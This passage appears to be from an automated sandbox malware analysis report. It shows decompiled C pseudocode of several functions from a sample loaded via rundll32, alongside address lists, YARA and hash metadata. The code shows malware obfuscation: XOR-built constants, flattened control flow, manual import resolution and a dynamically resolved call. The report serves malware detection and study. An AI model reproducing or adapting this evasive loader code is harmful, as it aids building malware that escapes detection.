				_v80 = _v80 >> 6;
				_v80 = _v80 ^ 0xc023484e;
				_v80 = _v80 / _t158;
				_v80 = _v80 ^ 0x155df6ec;
				_v72 = 0x4bfcfc;
				_v72 = _v72 | 0x0a339af0;
				_v72 = _v72 << 0xf;
				_t159 = 0x12;
				_v72 = _v72 / _t159;
				_v72 = _v72 ^ 0x0e3e5ce5;
				_v40 = 0xc0630c;
				_v40 = _v40 | 0x5d0d844d;
				_v40 = _v40 ^ 0x5dc4e99c;
				_v52 = 0x98b7b;
				_v52 = _v52 + 0xa105;
				_v52 = _v52 >> 5;
				_v52 = _v52 ^ 0x0004c78d;
				_v56 = 0xd0814a;
				_v56 = _v56 >> 9;
				_v56 = _v56 * 0x3e;
				_v56 = _v56 ^ 0x001a31dc;
				_v60 = 0xb9e1cb;
				_v60 = _v60 * 0x25;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0x768204a8;
				_v48 = 0xccd34a;
				_v48 = _v48 + 0xffff20ce;
				_v48 = _v48 ^ 0x00ce4dff;
				do {
					while(_t137 != 0x8f26e2d) {
						if(_t137 == 0xc99b7e9) {
							_t137 = 0x8f26e2d;
							continue;
						} else {
							if(_t137 != 0xfe1ef29) {
								goto L10;
							} else {
								_t133 =  *0x6a3dfc; // 0x0
								E0069E274(_v72, _v40, _t137,  *_t135,  *((intOrPtr*)(_t135 + 4)), _v44, _v52, _v56, _v60, _t137,  *((intOrPtr*)(_t133 + 0x40)), _v48,  &_v36);
								_t155 =  ==  ? 1 : _t155;
							}
						}
						L5:
						return _t155;
					}
					_push( *_t154);
					_t130 = E0069AE6D(_v76,  &_v36,  *((intOrPtr*)(_t154 + 4)), _v64, _t137, _v80);
					_t162 = _t162 + 0x14;
					if(_t130 == 0) {
						_t137 = 0xeaa5f76;
						goto L10;
					} else {
						_t137 = 0xfe1ef29;
						continue;
					}
					goto L5;
					L10:
				} while (_t137 != 0xeaa5f76);
				goto L5;
			}



























                                                                                                                      0x0068aeff
                                                                                                                      0x0068af06
                                                                                                                      0x0068af0a
                                                                                                                      0x0068af0c
                                                                                                                      0x0068af0d
                                                                                                                      0x0068af11
                                                                                                                      0x0068af15
                                                                                                                      0x0068af16
                                                                                                                      0x0068af17
                                                                                                                      0x0068af1c
                                                                                                                      0x0068af24
                                                                                                                      0x0068af27
                                                                                                                      0x0068af31
                                                                                                                      0x0068af39
                                                                                                                      0x0068af3b
                                                                                                                      0x0068af43
                                                                                                                      0x0068af48
                                                                                                                      0x0068af4d
                                                                                                                      0x0068af58
                                                                                                                      0x0068af5d
                                                                                                                      0x0068af63
                                                                                                                      0x0068af6b
                                                                                                                      0x0068af73
                                                                                                                      0x0068af7d
                                                                                                                      0x0068af80
                                                                                                                      0x0068af84
                                                                                                                      0x0068af8c
                                                                                                                      0x0068af94
                                                                                                                      0x0068afa4
                                                                                                                      0x0068afad
                                                                                                                      0x0068afb0
                                                                                                                      0x0068afb4
                                                                                                                      0x0068afbc
                                                                                                                      0x0068afc4
                                                                                                                      0x0068afc9
                                                                                                                      0x0068afd9
                                                                                                                      0x0068afdd
                                                                                                                      0x0068afe5
                                                                                                                      0x0068afed
                                                                                                                      0x0068aff5
                                                                                                                      0x0068affe
                                                                                                                      0x0068b001
                                                                                                                      0x0068b005
                                                                                                                      0x0068b00d
                                                                                                                      0x0068b015
                                                                                                                      0x0068b01d
                                                                                                                      0x0068b025
                                                                                                                      0x0068b02d
                                                                                                                      0x0068b035
                                                                                                                      0x0068b03a
                                                                                                                      0x0068b042
                                                                                                                      0x0068b04a
                                                                                                                      0x0068b054
                                                                                                                      0x0068b058
                                                                                                                      0x0068b060
                                                                                                                      0x0068b06d
                                                                                                                      0x0068b071
                                                                                                                      0x0068b076
                                                                                                                      0x0068b083
                                                                                                                      0x0068b08b
                                                                                                                      0x0068b093
                                                                                                                      0x0068b09b
                                                                                                                      0x0068b09b
                                                                                                                      0x0068b0a5
                                                                                                                      0x0068b101
                                                                                                                      0x00000000
                                                                                                                      0x0068b0a7
                                                                                                                      0x0068b0ad
                                                                                                                      0x00000000
                                                                                                                      0x0068b0b3
                                                                                                                      0x0068b0bc
                                                                                                                      0x0068b0e3
                                                                                                                      0x0068b0f4
                                                                                                                      0x0068b0f4
                                                                                                                      0x0068b0ad
                                                                                                                      0x0068b0f8
                                                                                                                      0x0068b100
                                                                                                                      0x0068b100
                                                                                                                      0x0068b105
                                                                                                                      0x0068b11b
                                                                                                                      0x0068b120
                                                                                                                      0x0068b125
                                                                                                                      0x0068b131
                                                                                                                      0x00000000
                                                                                                                      0x0068b127
                                                                                                                      0x0068b127
                                                                                                                      0x00000000
                                                                                                                      0x0068b127
                                                                                                                      0x00000000
                                                                                                                      0x0068b136
                                                                                                                      0x0068b136
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #@Z$_`
                                                                                                                      • API String ID: 0-2586238014
                                                                                                                      • Opcode ID: 28c71c5782de270dd2ec65bd86ba75c292342aa07133ee94ef5c853220346791
                                                                                                                      • Instruction ID: 75575286d9df1ee71a16678daca4dafc9fcf362ca2513a83695acadc0a47cac4
                                                                                                                      • Opcode Fuzzy Hash: 28c71c5782de270dd2ec65bd86ba75c292342aa07133ee94ef5c853220346791
                                                                                                                      • Instruction Fuzzy Hash: A95125711083009FC758DF22C88A81FBBE6FBD8758F549A1DF59696260C372DA49CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068DFF3 Relevance: 2.6, Strings: 2, Instructions: 135COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0068DFF3() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _t128;
				intOrPtr _t131;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t143;
				void* _t146;
				signed int* _t148;

				_t148 =  &_v52;
				_v12 = 0xa1a716;
				_v12 = _v12 + 0x2188;
				_v12 = _v12 ^ 0x00a02056;
				_v32 = 0x472a3;
				_v32 = _v32 + 0x22e5;
				_v32 = _v32 ^ 0xff9fab52;
				_v32 = _v32 ^ 0xff9c5b0a;
				_v48 = 0x9a7516;
				_v48 = _v48 + 0xffff4702;
				_v48 = _v48 * 0x45;
				_v48 = _v48 + 0xffff2ff5;
				_t146 = 0x4903f33;
				_v48 = _v48 ^ 0x296ff1ed;
				_v16 = 0xfa3b71;
				_v16 = _v16 << 9;
				_v16 = _v16 ^ 0xf47f6bba;
				_v20 = 0xc0b9b;
				_t133 = 0x7b;
				_v20 = _v20 * 0x52;
				_v20 = _v20 ^ 0x03d2ca7d;
				_v36 = 0x400b3e;
				_v36 = _v36 ^ 0xba288636;
				_v36 = _v36 ^ 0xc4c376ba;
				_v36 = _v36 ^ 0x7eaacb92;
				_v52 = 0x3419b2;
				_v52 = _v52 / _t133;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 | 0xcef26f8a;
				_v52 = _v52 ^ 0xcef1d6cf;
				_v4 = 0xb26f64;
				_t134 = 3;
				_v4 = _v4 / _t134;
				_v4 = _v4 ^ 0x003ff5cc;
				_v40 = 0x34a33d;
				_v40 = _v40 >> 4;
				_v40 = _v40 ^ 0xd21b54bd;
				_v40 = _v40 ^ 0x33ae4ce0;
				_v40 = _v40 ^ 0xe1b00bb7;
				_v8 = 0x4c76b4;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x013e4034;
				_v24 = 0x1c9e42;
				_v24 = _v24 ^ 0x4f10b4b5;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0xf0cd9088;
				_v44 = 0xfe69b1;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 * 0x49;
				_v44 = _v44 * 0x7d;
				_v44 = _v44 ^ 0x011db47c;
				_v28 = 0x46ec28;
				_v28 = _v28 << 9;
				_v28 = _v28 * 0x58;
				_v28 = _v28 ^ 0xc2551a85;
				_t135 =  *0x6a3e0c; // 0x0
				do {
					while(_t146 != 0x4903f33) {
						if(_t146 == 0x6f617aa) {
							_t128 = E006846BE(_t135, _v4, _t135, _v40, _t135, _v8, _v24, _v44, _t135, 0, E006881B7, _v28);
							_t135 =  *0x6a3e0c; // 0x0
							 *((intOrPtr*)(_t135 + 0x10)) = _t128;
						} else {
							if(_t146 != 0xc69f0b3) {
								goto L6;
							} else {
								_t131 = E00687AF6(_v16, _t135, _v20, _t135, _v36, _t135, _v52);
								_t135 =  *0x6a3e0c; // 0x0
								_t148 =  &(_t148[6]);
								_t146 = 0x6f617aa;
								 *((intOrPtr*)(_t135 + 8)) = _t131;
								continue;
							}
						}
						L9:
						return 0 | _t135 != 0x00000000;
					}
					_push(_t135);
					_push(_t135);
					_t143 = 0x24;
					_t135 = E00687FF2(_t143);
					_t146 = 0xc69f0b3;
					 *0x6a3e0c = _t135;
					L6:
				} while (_t146 != 0xab42793);
				goto L9;
			}
























                                                                                                                      0x0068dff3
                                                                                                                      0x0068dff6
                                                                                                                      0x0068e000
                                                                                                                      0x0068e008
                                                                                                                      0x0068e010
                                                                                                                      0x0068e018
                                                                                                                      0x0068e020
                                                                                                                      0x0068e028
                                                                                                                      0x0068e030
                                                                                                                      0x0068e038
                                                                                                                      0x0068e049
                                                                                                                      0x0068e052
                                                                                                                      0x0068e05a
                                                                                                                      0x0068e05c
                                                                                                                      0x0068e069
                                                                                                                      0x0068e076
                                                                                                                      0x0068e07b
                                                                                                                      0x0068e083
                                                                                                                      0x0068e092
                                                                                                                      0x0068e095
                                                                                                                      0x0068e099
                                                                                                                      0x0068e0a1
                                                                                                                      0x0068e0a9
                                                                                                                      0x0068e0b1
                                                                                                                      0x0068e0b9
                                                                                                                      0x0068e0c1
                                                                                                                      0x0068e0d1
                                                                                                                      0x0068e0d5
                                                                                                                      0x0068e0da
                                                                                                                      0x0068e0e2
                                                                                                                      0x0068e0ea
                                                                                                                      0x0068e0f6
                                                                                                                      0x0068e0f9
                                                                                                                      0x0068e0fd
                                                                                                                      0x0068e105
                                                                                                                      0x0068e10d
                                                                                                                      0x0068e112
                                                                                                                      0x0068e11a
                                                                                                                      0x0068e122
                                                                                                                      0x0068e12a
                                                                                                                      0x0068e132
                                                                                                                      0x0068e137
                                                                                                                      0x0068e13f
                                                                                                                      0x0068e147
                                                                                                                      0x0068e14f
                                                                                                                      0x0068e154
                                                                                                                      0x0068e15c
                                                                                                                      0x0068e164
                                                                                                                      0x0068e16e
                                                                                                                      0x0068e177
                                                                                                                      0x0068e17b
                                                                                                                      0x0068e183
                                                                                                                      0x0068e18b
                                                                                                                      0x0068e195
                                                                                                                      0x0068e199
                                                                                                                      0x0068e1a1
                                                                                                                      0x0068e1a7
                                                                                                                      0x0068e1a7
                                                                                                                      0x0068e1ad
                                                                                                                      0x0068e229
                                                                                                                      0x0068e22e
                                                                                                                      0x0068e237
                                                                                                                      0x0068e1af
                                                                                                                      0x0068e1b1
                                                                                                                      0x00000000
                                                                                                                      0x0068e1b3
                                                                                                                      0x0068e1c6
                                                                                                                      0x0068e1cb
                                                                                                                      0x0068e1d1
                                                                                                                      0x0068e1d4
                                                                                                                      0x0068e1d6
                                                                                                                      0x00000000
                                                                                                                      0x0068e1d6
                                                                                                                      0x0068e1b1
                                                                                                                      0x0068e23b
                                                                                                                      0x0068e248
                                                                                                                      0x0068e248
                                                                                                                      0x0068e1e7
                                                                                                                      0x0068e1e8
                                                                                                                      0x0068e1eb
                                                                                                                      0x0068e1f3
                                                                                                                      0x0068e1f5
                                                                                                                      0x0068e1f7
                                                                                                                      0x0068e1fd
                                                                                                                      0x0068e1fd
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (F$"
                                                                                                                      • API String ID: 0-1034852068
                                                                                                                      • Opcode ID: d05dfb3c583b544acb3fb8745088e7a7b539c27a426c58cf5bf8006a3e423e59
                                                                                                                      • Instruction ID: 0da1dd74783decf1b569f9a57fe1e333b0c00c82fef159b9257d7436544658fe
                                                                                                                      • Opcode Fuzzy Hash: d05dfb3c583b544acb3fb8745088e7a7b539c27a426c58cf5bf8006a3e423e59
                                                                                                                      • Instruction Fuzzy Hash: 325153714093019FC348DF25D98A80FBBE1FB84758F108A1DF595A6260D7B1DA09CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00687C37 Relevance: 2.6, Strings: 2, Instructions: 122COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E00687C37(void* __ecx, void* __edx) {
				void* _t91;
				void* _t102;
				signed short _t108;
				signed short _t111;
				signed short _t113;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed short _t121;
				intOrPtr _t128;
				signed short* _t132;
				signed short _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t136;

				_t134 =  *((intOrPtr*)(_t135 + 0x30));
				_push(_t134);
				_push( *((intOrPtr*)(_t135 + 0x38)));
				_push( *((intOrPtr*)(_t135 + 0x38)));
				_push(__edx);
				_push(__ecx);
				E006920B9(_t91);
				 *((intOrPtr*)(_t135 + 0x2c)) = 0x3628ac;
				_t136 = _t135 + 0x14;
				 *(_t136 + 0x18) =  *(_t136 + 0x18) + 0xfffff240;
				_t115 = 0x47;
				 *(_t136 + 0x1c) =  *(_t136 + 0x18) * 0x5d;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x13a7c7bd;
				 *(_t136 + 0x28) = 0x411077;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) / _t115;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x0001576b;
				 *(_t136 + 0x14) = 0x6ab109;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4522ba60;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) + 0x6e2e;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x405c50e2;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0x45775e58;
				 *(_t136 + 0x3c) = 0x583f0;
				_t116 = 0x13;
				 *(_t136 + 0x38) =  *(_t136 + 0x3c) / _t116;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0xb139aa03;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) * 0x57;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0x3aa1b70d;
				 *(_t136 + 0x28) = 0xeb6063;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) >> 9;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x000c5736;
				 *(_t136 + 0x20) = 0x8f08a1;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x1f969638;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) >> 2;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x07c9f7a9;
				 *(_t136 + 0x1c) = 0x46d0e7;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) >> 6;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) * 0x16;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x00141072;
				 *(_t136 + 0x14) = 0x9e0f5b;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) * 0x61;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4163d75f;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) << 6;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0xf8f2ab9c;
				_t117 =  *(_t136 + 0x18);
				_t102 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_t128 =  *((intOrPtr*)(_t102 + 0x78 + _t117 * 8));
				if(_t128 == 0 ||  *((intOrPtr*)(_t102 + 0x7c + _t117 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t133 = _t128 + _t134;
					while(1) {
						_t105 =  *((intOrPtr*)(_t133 + 0xc));
						if( *((intOrPtr*)(_t133 + 0xc)) == 0) {
							goto L13;
						}
						_t121 = E0069CADF( *((intOrPtr*)(_t136 + 0x2c)), _t105 + _t134,  *(_t136 + 0x14),  *(_t136 + 0x38));
						 *(_t136 + 0x18) = _t121;
						__eflags = _t121;
						if(_t121 == 0) {
							L15:
							return 0;
						}
						_t132 =  *_t133 + _t134;
						_t113 =  *((intOrPtr*)(_t133 + 0x10)) + _t134;
						while(1) {
							_t108 =  *_t132;
							__eflags = _t108;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t110 = _t108 + 2 + _t134;
								__eflags = _t108 + 2 + _t134;
							} else {
								_t110 = _t108 & 0x0000ffff;
							}
							_t111 = E00686CA0( *((intOrPtr*)(_t136 + 0x34)),  *((intOrPtr*)(_t136 + 0x2c)), _t110,  *((intOrPtr*)(_t136 + 0x24)),  *(_t136 + 0x18), _t121);
							_t136 = _t136 + 0x10;
							__eflags = _t111;
							if(_t111 == 0) {
								goto L15;
							} else {
								_t121 =  *(_t136 + 0x18);
								_t132 =  &(_t132[2]);
								 *_t113 = _t111;
								_t113 = _t113 + 4;
								__eflags = _t113;
								continue;
							}
						}
						_t133 = _t133 + 0x14;
						__eflags = _t133;
					}
					goto L13;
				}
			}


















                                                                                                                      0x00687c3c
                                                                                                                      0x00687c42
                                                                                                                      0x00687c43
                                                                                                                      0x00687c47
                                                                                                                      0x00687c4b
                                                                                                                      0x00687c4c
                                                                                                                      0x00687c4d
                                                                                                                      0x00687c52
                                                                                                                      0x00687c5a
                                                                                                                      0x00687c5d
                                                                                                                      0x00687c6e
                                                                                                                      0x00687c71
                                                                                                                      0x00687c75
                                                                                                                      0x00687c7d
                                                                                                                      0x00687c8d
                                                                                                                      0x00687c91
                                                                                                                      0x00687c99
                                                                                                                      0x00687ca1
                                                                                                                      0x00687ca9
                                                                                                                      0x00687cb1
                                                                                                                      0x00687cb9
                                                                                                                      0x00687cc1
                                                                                                                      0x00687ccd
                                                                                                                      0x00687cd0
                                                                                                                      0x00687cd4
                                                                                                                      0x00687ce1
                                                                                                                      0x00687ce5
                                                                                                                      0x00687ced
                                                                                                                      0x00687cf5
                                                                                                                      0x00687cfa
                                                                                                                      0x00687d02
                                                                                                                      0x00687d0a
                                                                                                                      0x00687d12
                                                                                                                      0x00687d17
                                                                                                                      0x00687d1f
                                                                                                                      0x00687d27
                                                                                                                      0x00687d31
                                                                                                                      0x00687d35
                                                                                                                      0x00687d3d
                                                                                                                      0x00687d4a
                                                                                                                      0x00687d4e
                                                                                                                      0x00687d56
                                                                                                                      0x00687d5b
                                                                                                                      0x00687d66
                                                                                                                      0x00687d6a
                                                                                                                      0x00687d6c
                                                                                                                      0x00687d72
                                                                                                                      0x00687df1
                                                                                                                      0x00000000
                                                                                                                      0x00687d7b
                                                                                                                      0x00687d7b
                                                                                                                      0x00687dea
                                                                                                                      0x00687dea
                                                                                                                      0x00687def
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00687d96
                                                                                                                      0x00687d98
                                                                                                                      0x00687d9c
                                                                                                                      0x00687d9e
                                                                                                                      0x00687dfc
                                                                                                                      0x00000000
                                                                                                                      0x00687dfc
                                                                                                                      0x00687da5
                                                                                                                      0x00687da7
                                                                                                                      0x00687de1
                                                                                                                      0x00687de1
                                                                                                                      0x00687de3
                                                                                                                      0x00687de5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00687dab
                                                                                                                      0x00687db5
                                                                                                                      0x00687db5
                                                                                                                      0x00687dad
                                                                                                                      0x00687dad
                                                                                                                      0x00687dad
                                                                                                                      0x00687dc9
                                                                                                                      0x00687dce
                                                                                                                      0x00687dd1
                                                                                                                      0x00687dd3
                                                                                                                      0x00000000
                                                                                                                      0x00687dd5
                                                                                                                      0x00687dd5
                                                                                                                      0x00687dd9
                                                                                                                      0x00687ddc
                                                                                                                      0x00687dde
                                                                                                                      0x00687dde
                                                                                                                      0x00000000
                                                                                                                      0x00687dde
                                                                                                                      0x00687dd3
                                                                                                                      0x00687de7
                                                                                                                      0x00687de7
                                                                                                                      0x00687de7
                                                                                                                      0x00000000
                                                                                                                      0x00687dea

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: X^wE$c`
                                                                                                                      • API String ID: 0-1321574684
                                                                                                                      • Opcode ID: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                      • Instruction ID: cfa84dce28b7a05a5f2d9f38693a653e06f348ece6b9601071de82a4e39dee1f
                                                                                                                      • Opcode Fuzzy Hash: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                      • Instruction Fuzzy Hash: F15187715083029FC758EF24D88692BBBE2FFC4358F60491DF48696221D3B1DA49CF96
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00684C5D Relevance: 2.6, Strings: 2, Instructions: 98COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 62%
                                                                                                                      			E00684C5D(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _t106;
				void* _t108;
				intOrPtr* _t109;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t128;

				_v44 = _v44 & 0x00000000;
				_v48 = 0xad4f7a;
				_v16 = 0xf18dbd;
				_v16 = _v16 + 0xffff4795;
				_v16 = _v16 << 0xe;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x00dff17e;
				_v12 = 0xaf5949;
				_v12 = _v12 | 0xe2d389df;
				_v12 = _v12 + 0x286;
				_t112 = 3;
				_v12 = _v12 / _t112;
				_v12 = _v12 ^ 0x4ba32b72;
				_v24 = 0x2aefd1;
				_t113 = 0x7d;
				_t128 = _a4;
				_v24 = _v24 * 0x59;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x3bb9ca43;
				_v8 = 0x985427;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x713a2c3c;
				_v8 = _v8 | 0x45eb1ca3;
				_v8 = _v8 ^ 0x77f5f6d4;
				_v28 = 0xa7f2b4;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 + 0x7e4a;
				_v28 = _v28 ^ 0x000cc7a8;
				_v40 = 0x7087c6;
				_t114 = 0x69;
				_v40 = _v40 / _t113;
				_v40 = _v40 ^ 0x00014835;
				_v20 = 0xcde00b;
				_v20 = _v20 + 0xffffcf30;
				_v20 = _v20 | 0xcdf6f1c4;
				_v20 = _v20 + 0xfc2b;
				_v20 = _v20 ^ 0xce0272c5;
				_v36 = 0x30875a;
				_v36 = _v36 * 0x47;
				_v36 = _v36 / _t114;
				_v36 = _v36 ^ 0x0028facf;
				_v32 = 0x6c449b;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 + 0xffff12fc;
				_v32 = _v32 ^ 0xfff19483;
				_t106 =  *((intOrPtr*)(_t128 + 0x1c))( *((intOrPtr*)(_t128 + 0x38)), 1, 0);
				_t134 = _t106;
				if(_t106 != 0) {
					_push(_v8);
					_push(_v24);
					_push(_v12);
					_t108 = E00698606(_v16, 0x681378, _t134);
					_push(_v20);
					_t130 = _t108;
					_push(_t108);
					_push(_v40);
					_t109 = E0068CBDF(_v28,  *((intOrPtr*)(_t128 + 0x38)));
					if(_t109 != 0) {
						 *_t109();
					}
					E0068A8B0(_v36, _t130, _v32);
				}
				return 0;
			}





















                                                                                                                      0x00684c63
                                                                                                                      0x00684c69
                                                                                                                      0x00684c70
                                                                                                                      0x00684c77
                                                                                                                      0x00684c7e
                                                                                                                      0x00684c82
                                                                                                                      0x00684c86
                                                                                                                      0x00684c8d
                                                                                                                      0x00684c94
                                                                                                                      0x00684c9b
                                                                                                                      0x00684ca8
                                                                                                                      0x00684cad
                                                                                                                      0x00684cb2
                                                                                                                      0x00684cb9
                                                                                                                      0x00684cc4
                                                                                                                      0x00684cc7
                                                                                                                      0x00684cca
                                                                                                                      0x00684ccd
                                                                                                                      0x00684cd1
                                                                                                                      0x00684cd8
                                                                                                                      0x00684cdf
                                                                                                                      0x00684ce3
                                                                                                                      0x00684cea
                                                                                                                      0x00684cf1
                                                                                                                      0x00684cf8
                                                                                                                      0x00684cff
                                                                                                                      0x00684d03
                                                                                                                      0x00684d0a
                                                                                                                      0x00684d11
                                                                                                                      0x00684d1d
                                                                                                                      0x00684d1e
                                                                                                                      0x00684d23
                                                                                                                      0x00684d2a
                                                                                                                      0x00684d31
                                                                                                                      0x00684d38
                                                                                                                      0x00684d3f
                                                                                                                      0x00684d46
                                                                                                                      0x00684d4d
                                                                                                                      0x00684d5c
                                                                                                                      0x00684d64
                                                                                                                      0x00684d67
                                                                                                                      0x00684d6e
                                                                                                                      0x00684d75
                                                                                                                      0x00684d79
                                                                                                                      0x00684d80
                                                                                                                      0x00684d8a
                                                                                                                      0x00684d8d
                                                                                                                      0x00684d8f
                                                                                                                      0x00684d92
                                                                                                                      0x00684d9a
                                                                                                                      0x00684d9d
                                                                                                                      0x00684da3
                                                                                                                      0x00684da8
                                                                                                                      0x00684dab
                                                                                                                      0x00684dad
                                                                                                                      0x00684dae
                                                                                                                      0x00684db7
                                                                                                                      0x00684dc1
                                                                                                                      0x00684dc3
                                                                                                                      0x00684dc3
                                                                                                                      0x00684dcd
                                                                                                                      0x00684dd3
                                                                                                                      0x00684dda

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <,:q$J~
                                                                                                                      • API String ID: 0-951887683
                                                                                                                      • Opcode ID: 3ac9c56c6a5d6f89f5b14cd581a333342dad8ce47dcd498e978e92f498ed7df6
                                                                                                                      • Instruction ID: f72c20677c66b8c18dfe16d24bdd405a261bb1c27ac98bad1b59247703f43d91
                                                                                                                      • Opcode Fuzzy Hash: 3ac9c56c6a5d6f89f5b14cd581a333342dad8ce47dcd498e978e92f498ed7df6
                                                                                                                      • Instruction Fuzzy Hash: EF411F71D0130AABDF48DFA1C94A6EEBBB2FF54314F208159D400BA2A0DBB50B55CFA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068EE81 Relevance: 2.6, Strings: 2, Instructions: 95COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0068EE81(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				short _v48;
				short _v52;
				intOrPtr _v56;
				char _v576;
				intOrPtr* _t95;
				signed int _t99;
				signed int _t100;

				_v56 = 0x3b8b1c;
				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_v8 = 0xf9e323;
				_v8 = _v8 ^ 0x73816ffa;
				_v8 = _v8 + 0x5b26;
				_v8 = _v8 ^ 0x387262e7;
				_v8 = _v8 ^ 0x4b076809;
				_v20 = 0x75aab0;
				_v20 = _v20 ^ 0xc40c30fa;
				_v20 = _v20 + 0x78e9;
